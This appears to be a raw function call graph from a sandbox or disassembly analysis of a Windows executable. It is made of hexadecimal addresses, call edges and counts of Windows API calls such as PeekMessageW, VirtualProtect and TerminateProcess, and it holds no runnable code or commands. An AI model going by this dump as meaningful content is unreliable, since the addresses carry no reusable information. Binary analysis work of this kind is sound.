101265->101261 101276 7d9ea0 101265->101276 101300 7d8740 68 API calls __cinit 101265->101300 101301 7d8542 68 API calls 101265->101301 101302 7d84c0 101265->101302 101307 7d843a 68 API calls 101265->101307 101308 7dcf7c 341 API calls 101265->101308 101309 7d9dda 59 API calls Mailbox 101265->101309 101310 7dcf00 89 API calls 101265->101310 101311 7dcd7d 341 API calls 101265->101311 101315 7d8a52 68 API calls 101265->101315 101316 7d9d3c 101265->101316 101329 82678d 60 API calls 101265->101329 101330 7d8047 101265->101330 101277 7d9ebf 101276->101277 101284 7d9eed Mailbox 101276->101284 101278 7f0db6 Mailbox 59 API calls 101277->101278 101278->101284 101279 7db47a 101282 8109e5 101279->101282 101283 810055 101279->101283 101280 7db475 101281 7d8047 59 API calls 101280->101281 101287 7da057 101281->101287 101341 839e4a 89 API calls 4 library calls 101282->101341 101338 839e4a 89 API calls 4 library calls 101283->101338 101284->101279 101284->101280 101284->101283 101284->101287 101290 7f0db6 59 API calls Mailbox 101284->101290 101293 7d8047 59 API calls 101284->101293 101294 7d7667 59 API calls 101284->101294 101295 826e8f 59 API calls 101284->101295 101296 7f2d40 67 API calls __cinit 101284->101296 101297 8109d6 101284->101297 101299 7da55a 101284->101299 101336 7dc8c0 341 API calls 2 library calls 101284->101336 101337 7db900 60 API calls Mailbox 101284->101337 101287->101265 101289 810064 101289->101265 101290->101284 101293->101284 101294->101284 101295->101284 101296->101284 101340 839e4a 89 API calls 4 library calls 101297->101340 101339 839e4a 89 API calls 4 library calls 101299->101339 101300->101265 101301->101265 101303 7d84cb 101302->101303 101305 7d84f2 101303->101305 101342 7d89b3 69 API calls Mailbox 101303->101342 101305->101265 101306->101262 101307->101265 101308->101265 101309->101265 101310->101265 101311->101265 101312->101255 101313->101260 101314->101265 101315->101265 101317 7d9d4a 101316->101317 101327 7d9d78 Mailbox 101316->101327 101318 7d9d9d 101317->101318 101322 7d9d50 Mailbox 101317->101322 101321 7d8047 59 API calls 101318->101321 101319 7d9d64 101323 7d9dcc 101319->101323 101324 7d9d6f 101319->101324 101319->101327 101320 80fa0f 101320->101327 101344 826e8f 59 API calls 101320->101344 101321->101327 101322->101319 101322->101320 101323->101327 101343 7d8cd4 59 API calls Mailbox 101323->101343 101326 80f9e6 VariantClear 101324->101326 101324->101327 101326->101327 101327->101265 101329->101265 101331 7d805a 101330->101331 101332 7d8052 101330->101332 101331->101265 101345 7d7f77 59 API calls 2 library calls 101332->101345 101334->101260 101335->101254 101336->101284 101337->101284 101338->101289 101339->101287 101340->101282 101341->101287 101342->101305 101343->101327 101344->101327 101345->101331 101346 80fe27 101359 7ef944 101346->101359 101348 80fe3d 101349 80fe53 101348->101349 101350 80febe 101348->101350 101448 7d9e5d 60 API calls 101349->101448 101368 7dfce0 101350->101368 101352 80fe92 101354 80fe9a 101352->101354 101355 81089c 101352->101355 101449 83834f 59 API calls Mailbox 101354->101449 101450 839e4a 89 API calls 4 library calls 101355->101450 101358 80feb2 Mailbox 101360 7ef962 101359->101360 101361 7ef950 101359->101361 101363 7ef968 101360->101363 101364 7ef991 101360->101364 101362 7d9d3c 60 API calls 101361->101362 101367 7ef95a 101362->101367 101365 7f0db6 Mailbox 59 API calls 101363->101365 101366 7d9d3c 60 API calls 101364->101366 101365->101367 101366->101367 101367->101348 101451 7d8180 101368->101451 101370 7dfd3d 101371 7e06f6 101370->101371 101372 81472d 101370->101372 101456 7df234 101370->101456 101562 839e4a 89 API calls 4 library calls 101371->101562 101563 839e4a 89 API calls 4 library calls 101372->101563 101376 814742 101377 81488d 101377->101376 101380 7dfe4c 101377->101380 101569 84a2d9 85 API calls Mailbox 101377->101569 101378 7dfe3e 101378->101377 101378->101380 101567 8266ec 59 API calls 2 library calls 101378->101567 101379 7e0517 101386 7f0db6 Mailbox 59 API calls 101379->101386 101388 8148f9 101380->101388 101435 814b53 101380->101435 101460 7d837c 101380->101460 101381 8147d7 101381->101376 101565 839e4a 89 API calls 4 library calls 101381->101565 101398 7e0545 _memmove 101386->101398 101387 814848 101568 8260ef 59 API calls 2 library calls 101387->101568 101393 814917 101388->101393 101571 7d85c0 101388->101571 101391 814755 101391->101381 101564 7df6a3 341 API calls 101391->101564 101402 814928 101393->101402 101403 7d85c0 59 API calls 101393->101403 101394 7dfea4 101404 814ad6 101394->101404 101405 7dff32 101394->101405 101441 7e0179 Mailbox _memmove 101394->101441 101395 81486b 101399 7d9ea0 341 API calls 101395->101399 101396 8148b2 Mailbox 101396->101380 101570 8266ec 59 API calls 2 library calls 101396->101570 101406 7f0db6 Mailbox 59 API calls 101398->101406 101399->101377 101400 7f0db6 59 API calls Mailbox 101410 7dfdd3 101400->101410 101402->101441 101579 8260ab 59 API calls Mailbox 101402->101579 101403->101402 101583 839ae7 60 API calls 101404->101583 101409 7f0db6 Mailbox 59 API calls 101405->101409 101432 7e0106 _memmove 101406->101432 101412 7dff39 101409->101412 101410->101376 101410->101378 101410->101379 101410->101391 101410->101398 101410->101400 101413 7d9ea0 341 API calls 101410->101413 101420 81480c 101410->101420 101412->101371 101467 7e09d0 101412->101467 101413->101410 101414 814a4d 101415 7d9ea0 341 API calls 101414->101415 101417 814a87 101415->101417 101417->101376 101422 7d84c0 69 API calls 101417->101422 101419 7dffb2 101419->101371 101419->101398 101426 7dffe6 101419->101426 101566 839e4a 89 API calls 4 library calls 101420->101566 101425 814ab2 101422->101425 101582 839e4a 89 API calls 4 library calls 101425->101582 101429 7d8047 59 API calls 101426->101429 101433 7e0007 101426->101433 101428 7d9d3c 60 API calls 101428->101441 101429->101433 101430 7f0db6 59 API calls Mailbox 101430->101441 101432->101441 101447 7e0162 101432->101447 101557 7d9c90 101432->101557 101433->101371 101436 814b24 101433->101436 101439 7e004c 101433->101439 101434 7e0398 101434->101358 101435->101376 101584 839e4a 89 API calls 4 library calls 101435->101584 101437 7d9d3c 60 API calls 101436->101437 101437->101435 101438 7e00d8 101440 7d9d3c 60 API calls 101438->101440 101439->101371 101439->101435 101439->101438 101443 7e00eb 101440->101443 101441->101371 101441->101414 101441->101425 101441->101428 101441->101430 101441->101434 101442 814a1c 101441->101442 101555 7d8740 68 API calls __cinit 101441->101555 101556 7d8660 68 API calls 101441->101556 101580 835937 68 API calls 101441->101580 101581 7d89b3 69 API calls Mailbox 101441->101581 101445 7f0db6 Mailbox 59 API calls 101442->101445 101443->101371 101544 7d82df 101443->101544 101445->101414 101447->101358 101448->101352 101449->101358 101450->101358 101452 7d818f 101451->101452 101455 7d81aa 101451->101455 101453 7d7e4f 59 API calls 101452->101453 101454 7d8197 CharUpperBuffW 101453->101454 101454->101455 101455->101370 101457 7df251 101456->101457 101458 7df272 101457->101458 101585 839e4a 89 API calls 4 library calls 101457->101585 101458->101410 101461 7d838d 101460->101461 101462 80edbd 101460->101462 101463 7f0db6 Mailbox 59 API calls 101461->101463 101464 7d8394 101463->101464 101465 7d83b5 101464->101465 101586 7d8634 59 API calls Mailbox 101464->101586 101465->101388 101465->101394 101468 814cc3 101467->101468 101476 7e09f5 101467->101476 101653 839e4a 89 API calls 4 library calls 101468->101653 101470 7e0cfa 101470->101419 101472 7e0ee4 101472->101470 101474 7e0ef1 101472->101474 101651 7e1093 341 API calls Mailbox 101474->101651 101475 7e0a4b PeekMessageW 101542 7e0a05 Mailbox 101475->101542 101476->101542 101654 7d9e5d 60 API calls 101476->101654 101655 826349 341 API calls 101476->101655 101478 7e0ef8 LockWindowUpdate DestroyWindow GetMessageW 101478->101470 101481 7e0f2a 101478->101481 101480 814e81 Sleep 101480->101542 101484 815c58 TranslateMessage DispatchMessageW GetMessageW 101481->101484 101482 7e0ce4 101482->101470 101650 7e1070 10 API calls Mailbox 101482->101650 101484->101484 101485 815c88 101484->101485 101485->101470 101486 7e0ea5 TranslateMessage DispatchMessageW 101487 7e0e43 PeekMessageW 101486->101487 101487->101542 101488 814d50 TranslateAcceleratorW 101488->101487 101488->101542 101489 7d9e5d 60 API calls 101489->101542 101490 7e0d13 timeGetTime 101490->101542 101491 81581f WaitForSingleObject 101495 81583c GetExitCodeProcess CloseHandle 101491->101495 101491->101542 101493 7f0db6 59 API calls Mailbox 101493->101542 101494 7d7667 59 API calls 101528 7e0e70 Mailbox 101494->101528 101526 7e0f95 101495->101526 101496 7e0e5f Sleep 101496->101528 101497 7d8047 59 API calls 101497->101542 101498 815af8 Sleep 101498->101528 101501 7f049f timeGetTime 101501->101528 101502 7e0f4e timeGetTime 101652 7d9e5d 60 API calls 101502->101652 101505 815b8f GetExitCodeProcess 101509 815ba5 WaitForSingleObject 101505->101509 101510 815bbb CloseHandle 101505->101510 101507 855f25 110 API calls 101507->101528 101508 7db7dd 109 API calls 101508->101528 101509->101510 101509->101542 101510->101528 101513 815874 101513->101526 101514 815078 Sleep 101514->101542 101515 815c17 Sleep 101515->101542 101518 7d7de1 59 API calls 101518->101528 101521 7d9ea0 314 API calls 101521->101542 101524 7dfce0 314 API calls 101524->101542 101526->101419 101528->101494 101528->101501 101528->101505 101528->101507 101528->101508 101528->101513 101528->101514 101528->101515 101528->101518 101528->101526 101528->101542 101679 832408 60 API calls 101528->101679 101680 7d9e5d 60 API calls 101528->101680 101681 7d89b3 69 API calls Mailbox 101528->101681 101682 7db73c 341 API calls 101528->101682 101683 8264da 60 API calls 101528->101683 101684 835244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 101528->101684 101685 833c55 66 API calls Mailbox 101528->101685 101530 839e4a 89 API calls 101530->101542 101531 7d9c90 59 API calls Mailbox 101531->101542 101532 7d82df 59 API calls 101532->101542 101533 7d84c0 69 API calls 101533->101542 101534 82617e 59 API calls Mailbox 101534->101542 101535 7d7de1 59 API calls 101535->101542 101536 7d89b3 69 API calls 101536->101542 101537 8155d5 VariantClear 101537->101542 101538 826e8f 59 API calls 101538->101542 101539 81566b VariantClear 101539->101542 101540 815419 VariantClear 101540->101542 101541 7d8cd4 59 API calls Mailbox 101541->101542 101542->101475 101542->101480 101542->101482 101542->101486 101542->101487 101542->101488 101542->101489 101542->101490 101542->101491 101542->101493 101542->101496 101542->101497 101542->101498 101542->101502 101542->101521 101542->101524 101542->101526 101542->101528 101542->101530 101542->101531 101542->101532 101542->101533 101542->101534 101542->101535 101542->101536 101542->101537 101542->101538 101542->101539 101542->101540 101542->101541 101543 7db73c 314 API calls 101542->101543 101587 7de420 101542->101587 101594 7de6a0 101542->101594 101625 7df460 101542->101625 101645 7d31ce 101542->101645 101656 856018 59 API calls 101542->101656 101657 839a15 59 API calls Mailbox 101542->101657 101658 82d4f2 59 API calls 101542->101658 101659 7d9837 101542->101659 101677 8260ef 59 API calls 2 library calls 101542->101677 101678 7d8401 59 API calls 101542->101678 101543->101542 101545 80eda1 101544->101545 101546 7d82f2 101544->101546 101547 80edb1 101545->101547 102749 8261a4 59 API calls 101545->102749 101548 7d8339 Mailbox 101546->101548 101550 7d831c 101546->101550 101551 7d85c0 59 API calls 101546->101551 101548->101432 101552 7d8322 101550->101552 101553 7d85c0 59 API calls 101550->101553 101551->101550 101552->101548 101554 7d9c90 Mailbox 59 API calls 101552->101554 101553->101552 101554->101548 101555->101441 101556->101441 101558 7d9c9b 101557->101558 101559 7d9cd2 101558->101559 102750 7d8cd4 59 API calls Mailbox 101558->102750 101559->101432 101561 7d9cfd 101561->101432 101562->101372 101563->101376 101564->101381 101565->101376 101566->101376 101567->101387 101568->101395 101569->101396 101570->101396 101572 7d85ce 101571->101572 101578 7d85f6 101571->101578 101573 7d85dc 101572->101573 101574 7d85c0 59 API calls 101572->101574 101575 7d85e2 101573->101575 101576 7d85c0 59 API calls 101573->101576 101574->101573 101577 7d9c90 Mailbox 59 API calls 101575->101577 101575->101578 101576->101575 101577->101578 101578->101393 101579->101441 101580->101441 101581->101441 101582->101376 101583->101426 101584->101376 101585->101458 101586->101465 101588 7de43d 101587->101588 101589 7de451 101587->101589 101590 7de448 101588->101590 101686 7ddf00 341 API calls 2 library calls 101588->101686 101687 839e4a 89 API calls 4 library calls 101589->101687 101590->101542 101593 813aa4 101593->101593 101595 7de6d5 101594->101595 101596 813aa9 101595->101596 101599 7de73f 101595->101599 101608 7de799 101595->101608 101597 7d9ea0 341 API calls 101596->101597 101598 813abe 101597->101598 101624 7de970 Mailbox 101598->101624 101689 839e4a 89 API calls 4 library calls 101598->101689 101601 7d7667 59 API calls 101599->101601 101599->101608 101600 7d7667 59 API calls 101600->101608 101603 813b04 101601->101603 101605 7f2d40 __cinit 67 API calls 101603->101605 101604 7f2d40 __cinit 67 API calls 101604->101608 101605->101608 101606 813b26 101606->101542 101607 7d84c0 69 API calls 101607->101624 101608->101600 101608->101604 101608->101606 101609 7de95a 101608->101609 101608->101624 101609->101624 101690 839e4a 89 API calls 4 library calls 101609->101690 101611 7d8d40 59 API calls 101611->101624 101613 7d9ea0 341 API calls 101613->101624 101614 7d9c90 Mailbox 59 API calls 101614->101624 101620 839e4a 89 API calls 101620->101624 101621 813e25 101621->101542 101622 7df195 101694 839e4a 89 API calls 4 library calls 101622->101694 101623 7dea78 101623->101542 101624->101607 101624->101611 101624->101613 101624->101614 101624->101620 101624->101622 101624->101623 101688 7d7f77 59 API calls 2 library calls 101624->101688 101691 826e8f 59 API calls 101624->101691 101692 84c5c3 341 API calls 101624->101692 101693 84b53c 341 API calls Mailbox 101624->101693 101695 8493c6 341 API calls Mailbox 101624->101695 101626 7df4ba 101625->101626 101627 7df650 101625->101627 101628 7df4c6 101626->101628 101629 81441e 101626->101629 101630 7d7de1 59 API calls 101627->101630 101797 7df290 341 API calls 2 library calls 101628->101797 101798 84bc6b 101629->101798 101636 7df58c Mailbox 101630->101636 101633 81442c 101637 7df630 101633->101637 101838 839e4a 89 API calls 4 library calls 101633->101838 101635 7df4fd 101635->101633 101635->101636 101635->101637 101696 833c37 101636->101696 101699 84df37 101636->101699 101702 84445a 101636->101702 101711 83cb7a 101636->101711 101791 7d4e4a 101636->101791 101637->101542 101638 7d9c90 Mailbox 59 API calls 101639 7df5e3 101638->101639 101639->101637 101639->101638 101646 7d3212 101645->101646 101648 7d31e0 101645->101648 101646->101542 101647 7d3205 IsDialogMessageW 101647->101646 101647->101648 101648->101646 101648->101647 101649 80cf32 GetClassLongW 101648->101649 101649->101647 101649->101648 101650->101472 101651->101478 101652->101542 101653->101476 101654->101476 101655->101476 101656->101542 101657->101542 101658->101542 101660 7d9851 101659->101660 101672 7d984b 101659->101672 101661 80f5d3 __i64tow 101660->101661 101662 7d9899 101660->101662 101663 7d9857 __itow 101660->101663 101667 80f4da 101660->101667 102747 7f3698 83 API calls 3 library calls 101662->102747 101665 7f0db6 Mailbox 59 API calls 101663->101665 101669 7d9871 101665->101669 101668 80f552 Mailbox _wcscpy 101667->101668 101670 7f0db6 Mailbox 59 API calls 101667->101670 102748 7f3698 83 API calls 3 library calls 101668->102748 101671 7d7de1 59 API calls 101669->101671 101669->101672 101673 80f51f 101670->101673 101671->101672 101672->101542 101674 7f0db6 Mailbox 59 API calls 101673->101674 101675 80f545 101674->101675 101675->101668 101676 7d7de1 59 API calls 101675->101676 101676->101668 101677->101542 101678->101542 101679->101528 101680->101528 101681->101528 101682->101528 101683->101528 101684->101528 101685->101528 101686->101590 101687->101593 101688->101624 101689->101624 101690->101624 101691->101624 101692->101624 101693->101624 101694->101621 101695->101624 101839 83445a GetFileAttributesW 101696->101839 101843 84cadd 101699->101843 101701 84df47 101701->101639 101703 7d9837 84 API calls 101702->101703 101704 844494 101703->101704 101966 7d6240 101704->101966 101706 8444a4 101707 7d9ea0 341 API calls 101706->101707 101708 8444c9 101706->101708 101707->101708 101710 8444cd 101708->101710 101991 7d9a98 59 API calls Mailbox 101708->101991 101710->101639 101712 7d7667 59 API calls 101711->101712 101713 83cbaf 101712->101713 101714 7d7667 59 API calls 101713->101714 101715 83cbb8 101714->101715 101716 83cbcc 101715->101716 102207 7d9b3c 59 API calls 101715->102207 101718 7d9837 84 API calls 101716->101718 101719 83cbe9 101718->101719 101720 83cc0b 101719->101720 101721 83ccea 101719->101721 101726 83cd1a Mailbox 101719->101726 101722 7d9837 84 API calls 101720->101722 102011 7d4ddd 101721->102011 101724 83cc17 101722->101724 101727 7d8047 59 API calls 101724->101727 101726->101639 101729 83cc23 101727->101729 101728 83cd16 101728->101726 101731 7d7667 59 API calls 101728->101731 101735 83cc37 101729->101735 101736 83cc69 101729->101736 101730 7d4ddd 136 API calls 101730->101728 101732 83cd4b 101731->101732 101733 7d7667 59 API calls 101732->101733 101734 83cd54 101733->101734 101738 7d7667 59 API calls 101734->101738 101739 7d8047 59 API calls 101735->101739 101737 7d9837 84 API calls 101736->101737 101740 83cc76 101737->101740 101741 83cd5d 101738->101741 101742 83cc47 101739->101742 101743 7d8047 59 API calls 101740->101743 101744 7d7667 59 API calls 101741->101744 101745 7d7cab 59 API calls 101742->101745 101746 83cc82 101743->101746 101747 83cd66 101744->101747 101748 83cc51 101745->101748 102208 834a31 GetFileAttributesW 101746->102208 101750 7d9837 84 API calls 101747->101750 101751 7d9837 84 API calls 101748->101751 101753 83cd73 101750->101753 101754 83cc5d 101751->101754 101752 83cc8b 101755 83cc9e 101752->101755 101758 7d79f2 59 API calls 101752->101758 102035 7d459b 101753->102035 101757 7d7b2e 59 API calls 101754->101757 101760 7d9837 84 API calls 101755->101760 101765 83cca4 101755->101765 101757->101736 101758->101755 101759 83cd8e 102086 7d79f2 101759->102086 101762 83cccb 101760->101762 102209 8337ef 75 API calls Mailbox 101762->102209 101765->101726 101766 83cdd1 101767 7d8047 59 API calls 101766->101767 101769 83cddf 101767->101769 101768 7d79f2 59 API calls 101770 83cdae 101768->101770 102089 7d7b2e 101769->102089 101770->101766 101772 7d7bcc 59 API calls 101770->101772 101774 83cdc3 101772->101774 101776 7d7bcc 59 API calls 101774->101776 101775 7d7b2e 59 API calls 101777 83cdfb 101775->101777 101776->101766 101778 7d7b2e 59 API calls 101777->101778 101779 83ce09 101778->101779 101780 7d9837 84 API calls 101779->101780 101781 83ce15 101780->101781 102098 834071 101781->102098 101783 83ce26 101784 833c37 3 API calls 101783->101784 101785 83ce30 101784->101785 101786 7d9837 84 API calls 101785->101786 101790 83ce61 101785->101790 101787 83ce4e 101786->101787 102152 839155 101787->102152 101789 7d4e4a 84 API calls 101789->101726 101790->101789 101792 7d4e5b 101791->101792 101793 7d4e54 101791->101793 101795 7d4e7b FreeLibrary 101792->101795 101796 7d4e6a 101792->101796 101794 7f53a6 __fcloseall 83 API calls 101793->101794 101794->101792 101795->101796 101796->101639 101797->101635 101799 84bc96 101798->101799 101800 84bcb0 101798->101800 102739 839e4a 89 API calls 4 library calls 101799->102739 102740 84a213 59 API calls Mailbox 101800->102740 101803 84bcbb 101804 7d9ea0 340 API calls 101803->101804 101805 84bd1c 101804->101805 101806 84bdae 101805->101806 101809 84bd5d 101805->101809 101815 84bca8 Mailbox 101805->101815 101807 84be04 101806->101807 101808 84bdb4 101806->101808 101810 7d9837 84 API calls 101807->101810 101807->101815 102742 83791a 59 API calls 101808->102742 102741 8372df 59 API calls Mailbox 101809->102741 101811 84be16 101810->101811 101814 7d7e4f 59 API calls 101811->101814 101819 84be3a CharUpperBuffW 101814->101819 101815->101633 101816 84bdd7 102743 7d5d41 59 API calls Mailbox 101816->102743 101818 84bd8d 101821 7df460 340 API calls 101818->101821 101822 84be54 101819->101822 101820 84bddf Mailbox 101825 7dfce0 340 API calls 101820->101825 101821->101815 101823 84bea7 101822->101823 101824 84be5b 101822->101824 101826 7d9837 84 API calls 101823->101826 102744 8372df 59 API calls Mailbox 101824->102744 101825->101815 101827 84beaf 101826->101827 102745 7d9e5d 60 API calls 101827->102745 101830 84be89 101831 7df460 340 API calls 101830->101831 101831->101815 101832 84beb9 101832->101815 101833 7d9837 84 API calls 101832->101833 101834 84bed4 101833->101834 102746 7d5d41 59 API calls Mailbox 101834->102746 101836 84bee4 101837 7dfce0 340 API calls 101836->101837 101837->101815 101838->101637 101840 833c3e 101839->101840 101841 834475 FindFirstFileW 101839->101841 101840->101639 101841->101840 101842 83448a FindClose 101841->101842 101842->101840 101844 7d9837 84 API calls 101843->101844 101845 84cb1a 101844->101845 101850 84cb61 Mailbox 101845->101850 101881 84d7a5 101845->101881 101847 84cbb2 Mailbox 101847->101850 101855 7d9837 84 API calls 101847->101855 101868 84cdb9 101847->101868 101913 84fbce 59 API calls 2 library calls 101847->101913 101914 84cfdf 61 API calls 2 library calls 101847->101914 101848 84cf2e 101930 84d8c8 92 API calls Mailbox 101848->101930 101850->101701 101852 84cf3d 101853 84cdc7 101852->101853 101854 84cf49 101852->101854 101894 84c96e 101853->101894 101854->101850 101855->101847 101860 84ce00 101909 7f0c08 101860->101909 101863 84ce33 101916 7d92ce 101863->101916 101864 84ce1a 101915 839e4a 89 API calls 4 library calls 101864->101915 101867 84ce25 GetCurrentProcess TerminateProcess 101867->101863 101868->101848 101868->101853 101873 84cfa4 101873->101850 101876 84cfb8 FreeLibrary 101873->101876 101874 84ce6b 101928 84d649 107 API calls _free 101874->101928 101876->101850 101879 7d9d3c 60 API calls 101880 84ce7c 101879->101880 101880->101873 101880->101879 101929 7d8d40 59 API calls Mailbox 101880->101929 101931 84d649 107 API calls _free 101880->101931 101882 7d7e4f 59 API calls 101881->101882 101883 84d7c0 CharLowerBuffW 101882->101883 101932 82f167 101883->101932 101887 7d7667 59 API calls 101888 84d7f9 101887->101888 101939 7d784b 101888->101939 101890 84d810 101891 7d7d2c 59 API calls 101890->101891 101892 84d81c Mailbox 101891->101892 101893 84d858 Mailbox 101892->101893 101952 84cfdf 61 API calls 2 library calls 101892->101952 101893->101847 101895 84c989 101894->101895 101899 84c9de 101894->101899 101896 7f0db6 Mailbox 59 API calls 101895->101896 101898 84c9ab 101896->101898 101897 7f0db6 Mailbox 59 API calls 101897->101898 101898->101897 101898->101899 101900 84da50 101899->101900 101901 84dc79 Mailbox 101900->101901 101908 84da73 _strcat _wcscpy __wsetenvp 101900->101908 101901->101860 101902 7d9b98 59 API calls 101902->101908 101903 7d9be6 59 API calls 101903->101908 101904 7d9b3c 59 API calls 101904->101908 101905 7f571c 58 API calls __crtLCMapStringA_stat 101905->101908 101906 7d9837 84 API calls 101906->101908 101908->101901 101908->101902 101908->101903 101908->101904 101908->101905 101908->101906 101956 835887 61 API calls 2 library calls 101908->101956 101910 7f0c1d 101909->101910 101911 7f0cb5 VirtualProtect 101910->101911 101912 7f0c83 101910->101912 101911->101912 101912->101863 101912->101864 101913->101847 101914->101847 101915->101867 101917 7d92d6 101916->101917 101918 7f0db6 Mailbox 59 API calls 101917->101918 101919 7d92e4 101918->101919 101920 7d92f0 101919->101920 101957 7d91fc 59 API calls Mailbox 101919->101957 101922 7d9050 101920->101922 101958 7d9160 101922->101958 101924 7d905f 101925 7f0db6 Mailbox 59 API calls 101924->101925 101926 7d90fb 101924->101926 101925->101926 101926->101880 101927 7d8d40 59 API calls Mailbox 101926->101927 101927->101874 101928->101880 101929->101880 101930->101852 101931->101880 101934 82f192 __wsetenvp 101932->101934 101933 82f1d1 101933->101887 101933->101892 101934->101933 101935 82f1c7 101934->101935 101936 82f278 101934->101936 101935->101933 101953 7d78c4 61 API calls 101935->101953 101936->101933 101954 7d78c4 61 API calls 101936->101954 101940 7d785a 101939->101940 101941 7d78b7 101939->101941 101940->101941 101943 7d7865 101940->101943 101942 7d7d2c 59 API calls 101941->101942 101944 7d7888 _memmove 101942->101944 101945 80eb09 101943->101945 101946 7d7880 101943->101946 101944->101890 101947 7d8029 59 API calls 101945->101947 101955 7d7f27 59 API calls Mailbox 101946->101955 101949 80eb13 101947->101949 101950 7f0db6 Mailbox 59 API calls 101949->101950 101951 80eb33 101950->101951 101952->101893 101953->101935 101954->101936 101955->101944 101956->101908 101957->101920 101959 7d9169 Mailbox 101958->101959 101960 80f19f 101959->101960 101965 7d9173 101959->101965 101961 7f0db6 Mailbox 59 API calls 101960->101961 101963 80f1ab 101961->101963 101962 7d917a 101962->101924 101964 7d9c90 Mailbox 59 API calls 101964->101965 101965->101962 101965->101964 101992 7d7a16 101966->101992 101968 7d646a 101999 7d750f 101968->101999 101972 80dff6 102009 82f8aa 91 API calls 4 library calls 101972->102009 101975 7d6484 Mailbox 101975->101706 101977 7d750f 59 API calls 101985 7d6265 101977->101985 101978 80e004 101980 7d750f 59 API calls 101978->101980 101979 7d7d8c 59 API calls 101979->101985 101981 80e01a 101980->101981 101981->101975 101982 7d6799 _memmove 102010 82f8aa 91 API calls 4 library calls 101982->102010 101983 80df92 101984 7d8029 59 API calls 101983->101984 101986 80df9d 101984->101986 101985->101968 101985->101972 101985->101977 101985->101979 101985->101982 101985->101983 101988 7d7e4f 59 API calls 101985->101988 101997 7d5f6c 60 API calls 101985->101997 101998 7d5d41 59 API calls Mailbox 101985->101998 102007 7d5e72 60 API calls 101985->102007 102008 7d7924 59 API calls 2 library calls 101985->102008 101990 7f0db6 Mailbox 59 API calls 101986->101990 101989 7d643b CharUpperBuffW 101988->101989 101989->101985 101990->101982 101991->101710 101993 7f0db6 Mailbox 59 API calls 101992->101993 101994 7d7a3b 101993->101994 101995 7d8029 59 API calls 101994->101995 101996 7d7a4a 101995->101996 101996->101985 101997->101985 101998->101985 102000 7d75af 101999->102000 102006 7d7522 _memmove 101999->102006 102002 7f0db6 Mailbox 59 API calls 102000->102002 102001 7f0db6 Mailbox 59 API calls 102003 7d7529 102001->102003 102002->102006 102004 7d7552 102003->102004 102005 7f0db6 Mailbox 59 API calls 102003->102005 102004->101975 102005->102004 102006->102001 102007->101985 102008->101985 102009->101978 102010->101975 102210 7d4bb5 102011->102210 102016 7d4e08 LoadLibraryExW 102220 7d4b6a 102016->102220 102017 80d8e6 102018 7d4e4a 84 API calls 102017->102018 102020 80d8ed 102018->102020 102022 7d4b6a 3 API calls 102020->102022 102024 80d8f5 102022->102024 102246 7d4f0b 102024->102246 102025 7d4e2f 102025->102024 102026 7d4e3b 102025->102026 102028 7d4e4a 84 API calls 102026->102028 102029 7d4e40 102028->102029 102029->101728 102029->101730 102032 80d91c 102254 7d4ec7 102032->102254 102036 7d7667 59 API calls 102035->102036 102037 7d45b1 102036->102037 102038 7d7667 59 API calls 102037->102038 102039 7d45b9 102038->102039 102040 7d7667 59 API calls 102039->102040 102041 7d45c1 102040->102041 102042 7d7667 59 API calls 102041->102042 102043 7d45c9 102042->102043 102044 7d45fd 102043->102044 102045 80d4d2 102043->102045 102046 7d784b 59 API calls 102044->102046 102047 7d8047 59 API calls 102045->102047 102048 7d460b 102046->102048 102049 80d4db 102047->102049 102050 7d7d2c 59 API calls 102048->102050 102051 7d7d8c 59 API calls 102049->102051 102052 7d4615 102050->102052 102054 7d4640 102051->102054 102053 7d784b 59 API calls 102052->102053 102052->102054 102057 7d4636 102053->102057 102055 7d4680 102054->102055 102058 7d465f 102054->102058 102068 80d4fb 102054->102068 102056 7d784b 59 API calls 102055->102056 102060 7d4691 102056->102060 102061 7d7d2c 59 API calls 102057->102061 102059 7d79f2 59 API calls 102058->102059 102063 7d4669 102059->102063 102064 7d46a3 102060->102064 102066 7d8047 59 API calls 102060->102066 102061->102054 102062 80d5cb 102065 7d7bcc 59 API calls 102062->102065 102063->102055 102069 7d784b 59 API calls 102063->102069 102067 7d46b3 102064->102067 102070 7d8047 59 API calls 102064->102070 102081 80d588 102065->102081 102066->102064 102072 7d46ba 102067->102072 102073 7d8047 59 API calls 102067->102073 102068->102062 102071 80d5b4 102068->102071 102079 80d532 102068->102079 102069->102055 102070->102067 102071->102062 102076 80d59f 102071->102076 102074 7d8047 59 API calls 102072->102074 102083 7d46c1 Mailbox 102072->102083 102073->102072 102074->102083 102075 80d590 102077 7d7bcc 59 API calls 102075->102077 102078 7d7bcc 59 API calls 102076->102078 102077->102081 102078->102081 102079->102075 102084 80d57b 102079->102084 102080 7d79f2 59 API calls 102080->102081 102081->102055 102081->102080 102426 7d7924 59 API calls 2 library calls 102081->102426 102083->101759 102085 7d7bcc 59 API calls 102084->102085 102085->102081 102087 7d7e4f 59 API calls 102086->102087 102088 7d79fd 102087->102088 102088->101766 102088->101768 102090 80ec6b 102089->102090 102091 7d7b40 102089->102091 102433 827bdb 59 API calls _memmove 102090->102433 102427 7d7a51 102091->102427 102094 80ec75 102096 7d8047 59 API calls 102094->102096 102095 7d7b4c 102095->101775 102097 80ec7d Mailbox 102096->102097 102099 83408d 102098->102099 102100 834092 102099->102100 102101 8340a0 102099->102101 102102 7d8047 59 API calls 102100->102102 102103 7d7667 59 API calls 102101->102103 102104 83409b Mailbox 102102->102104 102105 8340a8 102103->102105 102104->101783 102106 7d7667 59 API calls 102105->102106 102107 8340b0 102106->102107 102108 7d7667 59 API calls 102107->102108 102109 8340bb 102108->102109 102110 7d7667 59 API calls 102109->102110 102111 8340c3 102110->102111 102112 7d7667 59 API calls 102111->102112 102113 8340cb 102112->102113 102114 7d7667 59 API calls 102113->102114 102115 8340d3 102114->102115 102116 7d7667 59 API calls 102115->102116 102117 8340db 102116->102117 102118 7d7667 59 API calls 102117->102118 102119 8340e3 102118->102119 102120 7d459b 59 API calls 102119->102120 102121 8340fa 102120->102121 102122 7d459b 59 API calls 102121->102122 102123 834113 102122->102123 102124 7d79f2 59 API calls 102123->102124 102125 83411f 102124->102125 102126 834132 102125->102126 102127 7d7d2c 59 API calls 102125->102127 102128 7d79f2 59 API calls 102126->102128 102127->102126 102129 83413b 102128->102129 102130 83414b 102129->102130 102131 7d7d2c 59 API calls 102129->102131 102132 7d8047 59 API calls 102130->102132 102131->102130 102133 834157 102132->102133 102134 7d7b2e 59 API calls 102133->102134 102135 834163 102134->102135 102434 834223 59 API calls 102135->102434 102137 834172 102435 834223 59 API calls 102137->102435 102139 834185 102140 7d79f2 